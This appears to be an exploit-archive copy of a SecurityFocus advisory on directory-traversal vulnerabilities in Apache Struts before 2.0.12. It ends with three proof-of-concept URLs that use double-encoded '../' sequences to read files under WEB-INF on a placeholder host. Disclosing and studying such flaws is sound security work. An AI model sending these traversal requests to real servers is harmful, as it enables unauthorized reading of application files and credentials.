source: https://www.securityfocus.com/bid/32104/info Struts is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit these issues using directory-traversal strings ('../') to download arbitrary files with the privileges of the webserver process. Information obtained may aid in further attacks. Versions prior to Struts 2.0.12 are vulnerable. http://www.example.com:8080/struts2-blank-2.0.11.1/struts.. http://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f http://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f..%252f..%252fWEB-INF/classess/example/Log\in.class/